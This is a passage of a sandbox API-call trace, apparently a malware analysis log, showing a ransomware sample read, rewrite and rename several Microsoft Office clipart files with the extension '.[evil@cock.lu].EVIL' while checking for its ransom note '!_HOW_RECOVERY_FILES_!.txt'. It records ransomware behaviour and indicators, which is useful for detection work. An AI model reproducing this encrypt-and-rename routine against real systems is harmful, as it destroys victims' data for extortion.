lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.444] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x2120, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2120, lpOverlapped=0x0) returned 1 [0166.444] CloseHandle (hObject=0x1a8) returned 1 [0166.445] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03451_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.445] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.445] __uncaught_exception () returned 0x84b1160800 [0166.445] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.445] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03451_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03451_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03451_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03451_.wmf.[evil@cock.lu].evil")) returned 1 [0166.446] ??_V@YAXPEAX@Z () returned 0x1 [0166.449] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03451_.WMF", dwFileAttributes=0x200) returned 0 [0166.449] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.449] wcsstr (_Str="PE03453_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.449] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03453_.WMF") returned 69 [0166.449] wcscmp (_String1="PE03453_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.449] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE03453_.WMF") returned 0x0 [0166.449] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03453_.WMF") returned 0x45 [0166.449] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03453_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.451] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f24, lpOverlapped=0x0) returned 1 [0166.453] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.454] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.454] _errno () returned 0x84b1160840 [0166.454] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.454] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1f40, lpOverlapped=0x0) returned 1 [0166.454] CloseHandle (hObject=0x1a8) returned 1 [0166.454] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03453_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.454] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.454] __uncaught_exception () returned 0x84b1160800 [0166.454] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.454] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03453_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03453_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03453_.wmf.[evil@cock.lu].evil")) returned 1 [0166.455] ??_V@YAXPEAX@Z () returned 0x1 [0166.458] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03453_.WMF", dwFileAttributes=0x200) returned 0 [0166.458] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.459] wcsstr (_Str="PE03459_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.459] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03459_.WMF") returned 69 [0166.459] wcscmp (_String1="PE03459_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.459] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE03459_.WMF") returned 0x0 [0166.459] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03459_.WMF") returned 0x45 [0166.459] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03459_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03459_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.461] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2178, lpOverlapped=0x0) returned 1 [0166.463] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.463] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.463] _errno () returned 0x84b1160840 [0166.463] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.463] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2180, lpOverlapped=0x0) returned 1 [0166.463] CloseHandle (hObject=0x1a8) returned 1 [0166.464] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03459_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.464] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.464] __uncaught_exception () returned 0x84b1160800 [0166.464] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.464] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03459_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03459_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03459_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03459_.wmf.[evil@cock.lu].evil")) returned 1 [0166.465] ??_V@YAXPEAX@Z () returned 0x1 [0166.468] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03459_.WMF", dwFileAttributes=0x200) returned 0 [0166.468] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.468] wcsstr (_Str="PE03464_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.468] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03464_.WMF") returned 69 [0166.468] wcscmp (_String1="PE03464_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.468] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE03464_.WMF") returned 0x0 [0166.468] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03464_.WMF") returned 0x45 [0166.468] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03464_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03464_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.470] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1664, lpOverlapped=0x0) returned 1 [0166.472] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.472] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.472] _errno () returned 0x84b1160840 [0166.472] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.472] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1680, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1680, lpOverlapped=0x0) returned 1 [0166.473] CloseHandle (hObject=0x1a8) returned 1 [0166.474] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03464_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.474] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.474] __uncaught_exception () returned 0x84b1160800 [0166.474] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.474] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03464_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03464_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03464_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03464_.wmf.[evil@cock.lu].evil")) returned 1 [0166.475] ??_V@YAXPEAX@Z () returned 0x1 [0166.478] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03464_.WMF", dwFileAttributes=0x200) returned 0 [0166.478] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.478] wcsstr (_Str="PE03466_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.478] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03466_.WMF") returned 69 [0166.478] wcscmp (_String1="PE03466_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.478] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE03466_.WMF") returned 0x0 [0166.478] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03466_.WMF") returned 0x45 [0166.478] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03466_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03466_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.480] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x41a0, lpOverlapped=0x0) returned 1 [0166.482] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.482] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.482] _errno () returned 0x84b1160840 [0166.482] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.482] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x41c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x41c0, lpOverlapped=0x0) returned 1 [0166.482] CloseHandle (hObject=0x1a8) returned 1 [0166.482] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03466_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.482] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.483] __uncaught_exception () returned 0x84b1160800 [0166.483] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.483] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03466_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03466_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03466_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03466_.wmf.[evil@cock.lu].evil")) returned 1 [0166.483] ??_V@YAXPEAX@Z () returned 0x1 [0166.486] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03466_.WMF", dwFileAttributes=0x200) returned 0 [0166.486] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.486] wcsstr (_Str="PE03470_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.486] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03470_.WMF") returned 69 [0166.486] wcscmp (_String1="PE03470_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.486] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE03470_.WMF") returned 0x0 [0166.486] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03470_.WMF") returned 0x45 [0166.486] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03470_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03470_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.488] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3998, lpOverlapped=0x0) returned 1 [0166.491] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.491] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.491] _errno () returned 0x84b1160840 [0166.491] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.491] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x39a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x39a0, lpOverlapped=0x0) returned 1 [0166.502] CloseHandle (hObject=0x1a8) returned 1 [0166.502] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03470_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.503] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.503] __uncaught_exception () returned 0x84b1160800 [0166.503] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.503] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03470_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03470_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03470_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03470_.wmf.[evil@cock.lu].evil")) returned 1 [0166.504] ??_V@YAXPEAX@Z () returned 0x1 [0166.508] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03470_.WMF", dwFileAttributes=0x200) returned 0 [0166.508] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.508] wcsstr (_Str="PE03513_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.508] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03513_.WMF") returned 69 [0166.508] wcscmp (_String1="PE03513_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.508] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE03513_.WMF") returned 0x0 [0166.508] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03513_.WMF") returned 0x45 [0166.508] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03513_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03513_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.510] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xec4, lpOverlapped=0x0) returned 1 [0166.513] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.514] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.514] _errno () returned 0x84b1160840 [0166.514] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.514] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xee0, lpOverlapped=0x0) returned 1 [0166.514] CloseHandle (hObject=0x1a8) returned 1 [0166.514] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03513_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.514] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.514] __uncaught_exception () returned 0x84b1160800 [0166.514] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.515] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03513_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03513_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03513_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03513_.wmf.[evil@cock.lu].evil")) returned 1 [0166.516] ??_V@YAXPEAX@Z () returned 0x1 [0166.519] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03513_.WMF", dwFileAttributes=0x200) returned 0 [0166.519] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.519] wcsstr (_Str="PE03668_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.519] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03668_.WMF") returned 69 [0166.519] wcscmp (_String1="PE03668_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.519] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE03668_.WMF") returned 0x0 [0166.519] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03668_.WMF") returned 0x45 [0166.519] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03668_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03668_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.522] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1868, lpOverlapped=0x0) returned 1 [0166.525] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.525] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.525] _errno () returned 0x84b1160840 [0166.525] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.525] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x1880, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1880, lpOverlapped=0x0) returned 1 [0166.526] CloseHandle (hObject=0x1a8) returned 1 [0166.526] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03668_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.526] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.526] __uncaught_exception () returned 0x84b1160800 [0166.526] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.526] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03668_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03668_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03668_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03668_.wmf.[evil@cock.lu].evil")) returned 1 [0166.527] ??_V@YAXPEAX@Z () returned 0x1 [0166.531] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03668_.WMF", dwFileAttributes=0x200) returned 0 [0166.531] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.531] wcsstr (_Str="PE03731_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.531] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03731_.WMF") returned 69 [0166.531] wcscmp (_String1="PE03731_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.531] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE03731_.WMF") returned 0x0 [0166.531] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03731_.WMF") returned 0x45 [0166.531] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03731_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03731_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.533] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9fc, lpOverlapped=0x0) returned 1 [0166.536] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.536] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.536] _errno () returned 0x84b1160840 [0166.536] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.536] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa00, lpOverlapped=0x0) returned 1 [0166.537] 